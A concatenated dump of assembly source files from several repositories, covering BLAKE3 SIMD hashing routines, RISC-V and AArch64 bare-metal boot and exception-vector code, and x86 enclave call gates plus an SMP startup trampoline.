pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
movups xmmword ptr [rdi], xmm0
movups xmmword ptr [rdi+0x10], xmm1
ret
.p2align 6
blake3_compress_xof_sse2:
_blake3_compress_xof_sse2:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
movdqu xmm4, xmmword ptr [rdi]
movdqu xmm5, xmmword ptr [rdi+0x10]
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm2, xmm4
pxor xmm3, xmm5
movups xmmword ptr [r9], xmm0
movups xmmword ptr [r9+0x10], xmm1
movups xmmword ptr [r9+0x20], xmm2
movups xmmword ptr [r9+0x30], xmm3
ret
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85
.long 0x3C6EF372, 0xA54FF53A
ADD0:
.long 0, 1, 2, 3
ADD1:
.long 4, 4, 4, 4
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 64, 64, 64, 64
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
PBLENDW_0x33_MASK:
.long 0xFFFFFFFF, 0x00000000, 0xFFFFFFFF, 0x00000000
PBLENDW_0xCC_MASK:
.long 0x00000000, 0xFFFFFFFF, 0x00000000, 0xFFFFFFFF
PBLENDW_0x3F_MASK:
.long 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000000
PBLENDW_0xC0_MASK:
.long 0x00000000, 0x00000000, 0x00000000, 0xFFFFFFFF
|
Misakait/charlotteos | 1,355 | src/entry.S | # size of each hart's stack is 1024 bytes
# 为每个核心的栈定义大小,这里是 1024 字节
.equ STACK_SIZE, 1024
# 将 _start 符号声明为全局可见,作为程序入口
.global _start
.text
_start:
# park harts with id != 0
# 让非 0 号核心“待命”
csrr t0, mhartid # 读 CSR 寄存器 mhartid,获取当前核心的ID,存入 t0 寄存器
mv tp, t0 # 将核心ID从 t0 移到 tp 寄存器中备份,以便后续使用
bnez t0, park # bnez (Branch if Not Equal to Zero): 如果 t0 不为零(即核心ID不是0),则跳转到 park 标签
# Setup stacks, the stack grows from bottom to top, so we put the
# stack pointer to the very end of the stack range.
# (注释有误,RISC-V 栈通常是向下生长的,但这里的计算逻辑是正确的)
# 为 0 号核心设置栈
slli t0, t0, 10 # slli (Shift Left Logical Immediate): 将 t0 (此时必为0) 左移 10 位。
# 2^10 = 1024,所以这行相当于 t0 = t0 * 1024。对于0号核心,t0 仍然是 0。
la sp, stacks + STACK_SIZE # la (Load Address): 将 `stacks` 标签的地址加上一个栈的大小(STACK_SIZE),结果加载到 sp (栈指针)。
# 这将 sp 指向了第一个栈空间的末尾(高地址处)。
add sp, sp, t0 # 将 sp 和 t0 相加。对于0号核心,t0是0,所以 sp 不变。
# (对于其他核心,这行代码会将 sp 指向属于它们自己的栈空间)
j rust_main
park:
wfi # wfi (Wait For Interrupt): 让CPU核心进入低功耗睡眠状态,直到被中断唤醒。
j park # 非 0 号核心在这里无限循环等待,进入“待命”状态 😴
# In the standard RISC-V calling convention, the stack pointer sp
# is always 16-byte aligned.
# 确保下面的 `stacks` 标签地址是 16 字节对齐的,这是一个好习惯,能提升性能。
.balign 16
stacks:
# .skip 指令:在这里预留一块内存空间
# STACK_SIZE * 8: 预留 8 个核心的栈空间 (1024 * 8 = 8192 字节)
# 这块内存就是所有核心的栈的总和。
.skip STACK_SIZE * 8
.end # 文件结束
|
MissBiwott25/comprehensive-rust. | 4,676 | src/bare-metal/aps/examples/src/exceptions.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* Saves the volatile registers onto the stack. This currently takes
* 14 instructions, so it can be used in exception handlers with 18
* instructions left.
*
* On return, x0 and x1 are initialised to elr_el2 and spsr_el2
* respectively, which can be used as the first and second arguments
* of a subsequent call.
*/
.macro save_volatile_to_stack
/* Reserve stack space and save registers x0-x18, x29 & x30. */
stp x0, x1, [sp, #-(8 * 24)]!
stp x2, x3, [sp, #8 * 2]
stp x4, x5, [sp, #8 * 4]
stp x6, x7, [sp, #8 * 6]
stp x8, x9, [sp, #8 * 8]
stp x10, x11, [sp, #8 * 10]
stp x12, x13, [sp, #8 * 12]
stp x14, x15, [sp, #8 * 14]
stp x16, x17, [sp, #8 * 16]
str x18, [sp, #8 * 18]
stp x29, x30, [sp, #8 * 20]
/*
* Save elr_el1 & spsr_el1. This such that we can take nested
* exception and still be able to unwind.
*/
mrs x0, elr_el1
mrs x1, spsr_el1
stp x0, x1, [sp, #8 * 22]
.endm
/**
* Restores the volatile registers from the stack. This currently
* takes 14 instructions, so it can be used in exception handlers
* while still leaving 18 instructions left; if paired with
* save_volatile_to_stack, there are 4 instructions to spare.
*/
.macro restore_volatile_from_stack
/* Restore registers x2-x18, x29 & x30. */
ldp x2, x3, [sp, #8 * 2]
ldp x4, x5, [sp, #8 * 4]
ldp x6, x7, [sp, #8 * 6]
ldp x8, x9, [sp, #8 * 8]
ldp x10, x11, [sp, #8 * 10]
ldp x12, x13, [sp, #8 * 12]
ldp x14, x15, [sp, #8 * 14]
ldp x16, x17, [sp, #8 * 16]
ldr x18, [sp, #8 * 18]
ldp x29, x30, [sp, #8 * 20]
/*
* Restore registers elr_el1 & spsr_el1, using x0 & x1 as scratch.
*/
ldp x0, x1, [sp, #8 * 22]
msr elr_el1, x0
msr spsr_el1, x1
/* Restore x0 & x1, and release stack space. */
ldp x0, x1, [sp], #8 * 24
.endm
/**
* This is a generic handler for exceptions taken at the current EL
* while using SP0. It behaves similarly to the SPx case by first
* switching to SPx, doing the work, then switching back to SP0 before
* returning.
*
* Switching to SPx and calling the Rust handler takes 16
* instructions. To restore and return we need an additional 16
* instructions, so we can implement the whole handler within the
* allotted 32 instructions.
*
*/
.macro current_exception_sp0 handler:req
msr spsel, #1
save_volatile_to_stack
bl \handler
restore_volatile_from_stack
msr spsel, #0
eret
.endm
/**
* This is a generic handler for exceptions taken at the current EL
* while using SPx. It saves volatile registers, calls the Rust
* handler, restores volatile registers, then returns.
*
* This also works for exceptions taken from EL0, if we don't care
* about non-volatile registers.
*
* Saving state and jumping to the Rust handler takes 15 instructions,
* and restoring and returning also takes 15 instructions, so we can
* fit the whole handler in 30 instructions, under the limit of 32.
*/
.macro current_exception_spx handler:req
save_volatile_to_stack
bl \handler
restore_volatile_from_stack
eret
.endm
.section .text.vector_table_el1, "ax"
.global vector_table_el1
.balign 0x800
vector_table_el1:
sync_cur_sp0:
current_exception_sp0 sync_exception_current
.balign 0x80
irq_cur_sp0:
current_exception_sp0 irq_current
.balign 0x80
fiq_cur_sp0:
current_exception_sp0 fiq_current
.balign 0x80
serr_cur_sp0:
current_exception_sp0 serr_current
.balign 0x80
sync_cur_spx:
current_exception_spx sync_exception_current
.balign 0x80
irq_cur_spx:
current_exception_spx irq_current
.balign 0x80
fiq_cur_spx:
current_exception_spx fiq_current
.balign 0x80
serr_cur_spx:
current_exception_spx serr_current
.balign 0x80
sync_lower_64:
current_exception_spx sync_lower
.balign 0x80
irq_lower_64:
current_exception_spx irq_lower
.balign 0x80
fiq_lower_64:
current_exception_spx fiq_lower
.balign 0x80
serr_lower_64:
current_exception_spx serr_lower
.balign 0x80
sync_lower_32:
current_exception_spx sync_lower
.balign 0x80
irq_lower_32:
current_exception_spx irq_lower
.balign 0x80
fiq_lower_32:
current_exception_spx fiq_lower
.balign 0x80
serr_lower_32:
current_exception_spx serr_lower
|
MissBiwott25/comprehensive-rust. | 1,445 | src/bare-metal/aps/examples/src/idmap.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
.set .L_TT_TYPE_BLOCK, 0x1
.set .L_TT_TYPE_PAGE, 0x3
.set .L_TT_TYPE_TABLE, 0x3
/* Access flag. */
.set .L_TT_AF, 0x1 << 10
/* Not global. */
.set .L_TT_NG, 0x1 << 11
.set .L_TT_XN, 0x3 << 53
.set .L_TT_MT_DEV, 0x0 << 2 // MAIR #0 (DEV_nGnRE)
.set .L_TT_MT_MEM, (0x1 << 2) | (0x3 << 8) // MAIR #1 (MEM_WBWA), inner shareable
.set .L_BLOCK_DEV, .L_TT_TYPE_BLOCK | .L_TT_MT_DEV | .L_TT_AF | .L_TT_XN
.set .L_BLOCK_MEM, .L_TT_TYPE_BLOCK | .L_TT_MT_MEM | .L_TT_AF | .L_TT_NG
.section ".rodata.idmap", "a", %progbits
.global idmap
.align 12
idmap:
/* level 1 */
.quad .L_BLOCK_DEV | 0x0 // 1 GiB of device mappings
.quad .L_BLOCK_MEM | 0x40000000 // 1 GiB of DRAM
.fill 254, 8, 0x0 // 254 GiB of unmapped VA space
.quad .L_BLOCK_DEV | 0x4000000000 // 1 GiB of device mappings
.fill 255, 8, 0x0 // 255 GiB of remaining VA space
|
MissBiwott25/comprehensive-rust. | 4,768 | src/bare-metal/aps/examples/src/entry.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
.macro adr_l, reg:req, sym:req
adrp \reg, \sym
add \reg, \reg, :lo12:\sym
.endm
.macro mov_i, reg:req, imm:req
movz \reg, :abs_g3:\imm
movk \reg, :abs_g2_nc:\imm
movk \reg, :abs_g1_nc:\imm
movk \reg, :abs_g0_nc:\imm
.endm
.set .L_MAIR_DEV_nGnRE, 0x04
.set .L_MAIR_MEM_WBWA, 0xff
.set .Lmairval, .L_MAIR_DEV_nGnRE | (.L_MAIR_MEM_WBWA << 8)
/* 4 KiB granule size for TTBR0_EL1. */
.set .L_TCR_TG0_4KB, 0x0 << 14
/* 4 KiB granule size for TTBR1_EL1. */
.set .L_TCR_TG1_4KB, 0x2 << 30
/*
* Disable translation table walk for TTBR1_EL1, generating a
* translation fault instead.
*/
.set .L_TCR_EPD1, 0x1 << 23
/* Translation table walks for TTBR0_EL1 are inner sharable. */
.set .L_TCR_SH_INNER, 0x3 << 12
/*
* Translation table walks for TTBR0_EL1 are outer write-back
* read-allocate write-allocate cacheable.
*/
.set .L_TCR_RGN_OWB, 0x1 << 10
/*
* Translation table walks for TTBR0_EL1 are inner write-back
* read-allocate write-allocate cacheable.
*/
.set .L_TCR_RGN_IWB, 0x1 << 8
/* Size offset for TTBR0_EL1 is 2**39 bytes (512 GiB). */
.set .L_TCR_T0SZ_512, 64 - 39
.set .Ltcrval, .L_TCR_TG0_4KB | .L_TCR_TG1_4KB | .L_TCR_EPD1 | .L_TCR_RGN_OWB
.set .Ltcrval, .Ltcrval | .L_TCR_RGN_IWB | .L_TCR_SH_INNER | .L_TCR_T0SZ_512
/* Stage 1 instruction access cacheability is unaffected. */
.set .L_SCTLR_ELx_I, 0x1 << 12
/* SP alignment fault if SP is not aligned to a 16 byte boundary. */
.set .L_SCTLR_ELx_SA, 0x1 << 3
/* Stage 1 data access cacheability is unaffected. */
.set .L_SCTLR_ELx_C, 0x1 << 2
/* EL0 and EL1 stage 1 MMU enabled. */
.set .L_SCTLR_ELx_M, 0x1 << 0
/*
* Privileged Access Never is unchanged on taking an exception to EL1.
*/
.set .L_SCTLR_EL1_SPAN, 0x1 << 23
/* SETEND instruction disabled at EL0 in aarch32 mode. */
.set .L_SCTLR_EL1_SED, 0x1 << 8
/* Various IT instructions are disabled at EL0 in aarch32 mode. */
.set .L_SCTLR_EL1_ITD, 0x1 << 7
.set .L_SCTLR_EL1_RES1, (0x1 << 11) | (0x1 << 20) | (0x1 << 22) | (0x1 << 28) | (0x1 << 29)
.set .Lsctlrval, .L_SCTLR_ELx_M | .L_SCTLR_ELx_C | .L_SCTLR_ELx_SA | .L_SCTLR_EL1_ITD | .L_SCTLR_EL1_SED
.set .Lsctlrval, .Lsctlrval | .L_SCTLR_ELx_I | .L_SCTLR_EL1_SPAN | .L_SCTLR_EL1_RES1
// ANCHOR: entry
/**
* This is a generic entry point for an image. It carries out the
* operations required to prepare the loaded image to be run.
* Specifically, it
*
* - sets up the MMU with an identity map of virtual to physical
* addresses, and enables caching
* - enables floating point
* - zeroes the bss section using registers x25 and above
* - prepares the stack, pointing to a section within the image
* - sets up the exception vector
* - branches to the Rust `main` function
*
* It preserves x0-x3 for the Rust entry point, as these may contain
* boot parameters.
*/
.section .init.entry, "ax"
.global entry
entry:
/*
* Load and apply the memory management configuration, ready to
* enable MMU and caches.
*/
adrp x30, idmap
msr ttbr0_el1, x30
mov_i x30, .Lmairval
msr mair_el1, x30
mov_i x30, .Ltcrval
/* Copy the supported PA range into TCR_EL1.IPS. */
mrs x29, id_aa64mmfr0_el1
bfi x30, x29, #32, #4
msr tcr_el1, x30
mov_i x30, .Lsctlrval
/*
* Ensure everything before this point has completed, then
* invalidate any potentially stale local TLB entries before they
* start being used.
*/
isb
tlbi vmalle1
ic iallu
dsb nsh
isb
/*
* Configure sctlr_el1 to enable MMU and cache and don't proceed
* until this has completed.
*/
msr sctlr_el1, x30
isb
/* Disable trapping floating point access in EL1. */
mrs x30, cpacr_el1
orr x30, x30, #(0x3 << 20)
msr cpacr_el1, x30
isb
/* Zero out the bss section. */
adr_l x29, bss_begin
adr_l x30, bss_end
0: cmp x29, x30
b.hs 1f
stp xzr, xzr, [x29], #16
b 0b
1: /* Prepare the stack. */
adr_l x30, boot_stack_end
mov sp, x30
/* Set up exception vector. */
adr x30, vector_table_el1
msr vbar_el1, x30
/* Call into Rust code. */
bl main
/* Loop forever waiting for interrupts. */
2: wfi
b 2b
|
mit-enclaves/argos-monitor | 1,088 | crates/bricks/src/x86_64/entry.S | .text
// Take a capa_index_t* and a void**, expected to be in rdi, rsi.
.globl asm_call_gate
asm_call_gate:
pushq %rbp
pushq %rbx
pushq %rcx
pushq %rdx
pushq %r10
pushq %r11
pushq %r12
pushq %r13
pushq %r14
pushq %r15
pushfq
// Now do the call, arguments are in the right registers.
pushq %rdi
pushq %rsi
movq (%rdi), %rdi
movq (%rsi), %rsi
movq $9, %rax // TYCHE_SWITCH s
vmcall
// We returned, move the return values into the registers.
popq %r15 // &rsi, i.e., void**
movq %rsi, (%r15)
popq %r15 // &rdi, i.e., capa_index_t*
movq %rdi, (%r15)
// Restore all registers, don't change rax.
popfq
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %rdx
popq %rcx
popq %rbx
popq %rbp
ret
.globl bricks_start
bricks_start:
movq %r11, %rsi
// Aligning the stack to 16 bytes, had bug with xmm registers
andl $-16, %esp
callq bricks_trusted_main
// Should never return here, call exit if we do.
movq $1, %rax
vmcall
|
mit-enclaves/argos-monitor | 3,305 | monitor/first-stage/src/smp/trampoline.S | # Upon receiving a SIPI from BSP, the AP starts in real mode with CS:IP set to XY00:0000.
# The assembly here tries to enter long mode directly from real mode (skipping protected mode)
#
# Useful links:
# - https://wiki.osdev.org/Symmetric_Multiprocessing#AP_Initialization_Code
# - https://wiki.osdev.org/Entering_Long_Mode_Directly
# - https://stackoverflow.com/questions/36968829/how-to-switch-from-real-mode-to-protected-mode-after-bootloader
# Special thanks to: https://github.com/rcore-os/x86-smpboot
.equ start_addr, 0x7000
.equ ap_trampoline64_start_paddr, start_addr + ap_trampoline64_start - ap_trampoline_start
.equ gdt_64_paddr, start_addr + gdt_64 - ap_trampoline_start
.equ gdt_64_ptr_paddr, start_addr + gdt_64_ptr - ap_trampoline_start
.equ CR0_PE, (1 << 0)
.equ CR0_PG, (1 << 31)
.equ CR4_PAE, (1 << 5)
.equ CR4_PGE, (1 << 7)
.equ EFER_LME, (1 << 8)
.equ EFER_NXE, (1 << 11)
.equ EFER_SCE, (1 << 0)
.global ap_trampoline_start
.global ap_trampoline_end
.equ cr3_ptr, start_addr + 0x0ff8
.equ entry_ptr, start_addr + 0x0ff0
.equ stack_ptr, start_addr + 0x0fe8
.equ temp_stack_ptr, start_addr + 0x0fe0
.text
.code16 # 16-bit mode
ap_trampoline_start:
# disable BIOS enabled interrupts
cli
# write back and invalidate cache
wbinvd
# zero out data segment registers DS, ES, and SS
xor ax, ax # ax
mov ds, ax # data segment
mov es, ax # extra segment
mov ss, ax # stack segment
# load idt with 0, 0 so that any NMI will cause a triple fault
# mov eax, idt_zero
# lidt [eax]
# cr4: enable PAE and PGE (0xa0)
mov eax, cr4
or eax, 0xa0
mov cr4, eax
# load cr3
mov eax, cr3_ptr
mov eax, [eax]
mov cr3, eax
# EFER: enable LME and NXE
mov ecx, 0xC0000080
rdmsr
or eax, EFER_LME | EFER_NXE | EFER_SCE
wrmsr
# cr0: enable PE and PG (CR0_PE | CR0_PG)
mov eax, 1
shl eax, 31
or eax, 1
mov ebx, cr0
or ebx, eax
mov cr0, ebx
# lgdt: load 64-bit GDT
lgdt [gdt_64_ptr_paddr]
# esp: point to temporary stack
mov esp, temp_stack_ptr
# jump to long mode directly
push 0x8
lea eax, [ap_trampoline64_start_paddr]
push eax
retf
.code64
ap_trampoline64_start:
# zero out data segment registers DS, ES, SS, FS, GS, SS
xor ax, ax
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
mov ss, ax
# enter the entry function
mov rsp, [stack_ptr]
mov rax, [entry_ptr]
call rax
spin_hlt:
hlt
jmp spin_hlt
gdt_64:
.quad 0x0000000000000000 # NULL-segment descriptor (mandatory)
.quad 0x00209A0000000000 # Code segment descriptor (required to switch to protected mode)
.quad 0x0000920000000000 # Data segment descriptor (access data in memory after switching to protected mode)
.align 4
.word 0 # Padding to make the address of the GDT aligned on a 4-byte boundary
gdt_64_ptr:
.word gdt_64_ptr - gdt_64 - 1 # 16-bit Size (Limit) of GDT.
.long gdt_64_paddr # 32-bit Base Address of GDT. (CPU will zero extend to 64-bit)
ap_trampoline_end:
|
mit-enclaves/argos-monitor | 1,061 | C/libraries/sdktyche/runtime/asm.S | #if defined CONFIG_X86 || defined(__x86_64__)
.text
// Take a capa_index_t* and a void**, expected to be in rdi, rsi.
.globl asm_call_gate
asm_call_gate:
pushq %rbp
pushq %rbx
pushq %rcx
pushq %rdx
pushq %r10
pushq %r11
pushq %r12
pushq %r13
pushq %r14
pushq %r15
pushfq
// Now do the call, arguments are in the right registers.
//pushq %rdi
//pushq %rsi
//movq (%rdi), %rdi
//movq (%rsi), %rsi
movq $8, %rax // TYCHE_SWITCH
vmcall
// We returned, move the return values into the registers.
//popq %r15 // &rsi, i.e., void**
//movq %rsi, (%r15)
//popq %r15 // &rdi, i.e., capa_index_t*
//movq %rdi, (%r15)
// Restore all registers, don't change rax.
popfq
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %rdx
popq %rcx
popq %rbx
popq %rbp
ret
.globl _start
_start:
//movq %r11, %rsi
callq trusted_main
// Should never return here, call exit if we do.
movq $1, %rax
vmcall
#endif
|
mit-enclaves/argos-monitor | 161,672 | C/libraries/sdktyche/loader/blake3_avx512_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global _blake3_hash_many_avx512
.global blake3_hash_many_avx512
.global blake3_compress_in_place_avx512
.global _blake3_compress_in_place_avx512
.global blake3_compress_xof_avx512
.global _blake3_compress_xof_avx512
.global blake3_xof_many_avx512
.global _blake3_xof_many_avx512
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_avx512:
blake3_hash_many_avx512:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 144
and rsp, 0xFFFFFFFFFFFFFFC0
neg r9
kmovw k1, r9d
vmovd xmm0, r8d
vpbroadcastd ymm0, xmm0
shr r8, 32
vmovd xmm1, r8d
vpbroadcastd ymm1, xmm1
vmovdqa ymm4, ymm1
vmovdqa ymm5, ymm1
vpaddd ymm2, ymm0, ymmword ptr [ADD0+rip]
vpaddd ymm3, ymm0, ymmword ptr [ADD0+32+rip]
vpcmpltud k2, ymm2, ymm0
vpcmpltud k3, ymm3, ymm0
vpaddd ymm4 {k2}, ymm4, dword ptr [ADD1+rip] {1to8}
vpaddd ymm5 {k3}, ymm5, dword ptr [ADD1+rip] {1to8}
knotw k2, k1
vmovdqa32 ymm2 {k2}, ymm0
vmovdqa32 ymm3 {k2}, ymm0
vmovdqa32 ymm4 {k2}, ymm1
vmovdqa32 ymm5 {k2}, ymm1
vmovdqa ymmword ptr [rsp], ymm2
vmovdqa ymmword ptr [rsp+0x1*0x20], ymm3
vmovdqa ymmword ptr [rsp+0x2*0x20], ymm4
vmovdqa ymmword ptr [rsp+0x3*0x20], ymm5
shl rdx, 6
mov qword ptr [rsp+0x80], rdx
cmp rsi, 16
jc 3f
2:
vpbroadcastd zmm0, dword ptr [rcx]
vpbroadcastd zmm1, dword ptr [rcx+0x1*0x4]
vpbroadcastd zmm2, dword ptr [rcx+0x2*0x4]
vpbroadcastd zmm3, dword ptr [rcx+0x3*0x4]
vpbroadcastd zmm4, dword ptr [rcx+0x4*0x4]
vpbroadcastd zmm5, dword ptr [rcx+0x5*0x4]
vpbroadcastd zmm6, dword ptr [rcx+0x6*0x4]
vpbroadcastd zmm7, dword ptr [rcx+0x7*0x4]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
.p2align 5
9:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x80]
cmove eax, ebx
mov dword ptr [rsp+0x88], eax
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x40]
mov r13, qword ptr [rdi+0x48]
mov r14, qword ptr [rdi+0x50]
mov r15, qword ptr [rdi+0x58]
vmovdqu32 ymm16, ymmword ptr [rdx+r8-0x2*0x20]
vinserti64x4 zmm16, zmm16, ymmword ptr [rdx+r12-0x2*0x20], 0x01
vmovdqu32 ymm17, ymmword ptr [rdx+r9-0x2*0x20]
vinserti64x4 zmm17, zmm17, ymmword ptr [rdx+r13-0x2*0x20], 0x01
vpunpcklqdq zmm8, zmm16, zmm17
vpunpckhqdq zmm9, zmm16, zmm17
vmovdqu32 ymm18, ymmword ptr [rdx+r10-0x2*0x20]
vinserti64x4 zmm18, zmm18, ymmword ptr [rdx+r14-0x2*0x20], 0x01
vmovdqu32 ymm19, ymmword ptr [rdx+r11-0x2*0x20]
vinserti64x4 zmm19, zmm19, ymmword ptr [rdx+r15-0x2*0x20], 0x01
vpunpcklqdq zmm10, zmm18, zmm19
vpunpckhqdq zmm11, zmm18, zmm19
mov r8, qword ptr [rdi+0x20]
mov r9, qword ptr [rdi+0x28]
mov r10, qword ptr [rdi+0x30]
mov r11, qword ptr [rdi+0x38]
mov r12, qword ptr [rdi+0x60]
mov r13, qword ptr [rdi+0x68]
mov r14, qword ptr [rdi+0x70]
mov r15, qword ptr [rdi+0x78]
vmovdqu32 ymm16, ymmword ptr [rdx+r8-0x2*0x20]
vinserti64x4 zmm16, zmm16, ymmword ptr [rdx+r12-0x2*0x20], 0x01
vmovdqu32 ymm17, ymmword ptr [rdx+r9-0x2*0x20]
vinserti64x4 zmm17, zmm17, ymmword ptr [rdx+r13-0x2*0x20], 0x01
vpunpcklqdq zmm12, zmm16, zmm17
vpunpckhqdq zmm13, zmm16, zmm17
vmovdqu32 ymm18, ymmword ptr [rdx+r10-0x2*0x20]
vinserti64x4 zmm18, zmm18, ymmword ptr [rdx+r14-0x2*0x20], 0x01
vmovdqu32 ymm19, ymmword ptr [rdx+r11-0x2*0x20]
vinserti64x4 zmm19, zmm19, ymmword ptr [rdx+r15-0x2*0x20], 0x01
vpunpcklqdq zmm14, zmm18, zmm19
vpunpckhqdq zmm15, zmm18, zmm19
vmovdqa32 zmm27, zmmword ptr [INDEX0+rip]
vmovdqa32 zmm31, zmmword ptr [INDEX1+rip]
vshufps zmm16, zmm8, zmm10, 136
vshufps zmm17, zmm12, zmm14, 136
vmovdqa32 zmm20, zmm16
vpermt2d zmm16, zmm27, zmm17
vpermt2d zmm20, zmm31, zmm17
vshufps zmm17, zmm8, zmm10, 221
vshufps zmm30, zmm12, zmm14, 221
vmovdqa32 zmm21, zmm17
